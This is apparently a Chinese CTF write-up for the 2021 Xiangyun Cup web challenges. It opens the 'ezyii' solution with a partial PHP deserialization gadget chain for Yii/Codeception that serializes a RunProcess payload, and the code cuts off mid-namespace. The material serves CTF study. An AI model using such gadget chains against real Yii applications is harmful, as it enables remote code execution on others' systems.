WP-2021祥云杯

本文是关于WP-2021祥云杯的安全比赛总结,重点关注Web安全领域的挑战。文章讨论了Yii框架的最新反序列化漏洞,提供了复现和利用的方法,并介绍了文件包含session条件竞争的考点,分享了相关资源和解决方案。作者认为题目主要侧重于代码审计,表示自己仍需进一步学习。
摘要由CSDN通过智能技术生成

前言

好多审计题,懒狗的我,自愧不如。赛后借助各位师傅的wp进行复现,不会的题目赛后加强学习知识点,盲看没什么用。

链接

复现平台:https://buuoj.cn/

WEB

ezyii

考点:yii最新反序列化漏洞
这题就是网上有的yii链子,1day好像。利用这个https://xz.aliyun.com/t/9948#toc-6直接拿。
 代码

<?php
namespace Codeception\Extension{
   
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
   
        protected $output;
        private $processes = [];
        public function __construct(){
   
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('Firebasky');
        }
    }

    echo base64_encode(serialize(new RunProcess()));
}

namespace Faker<
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值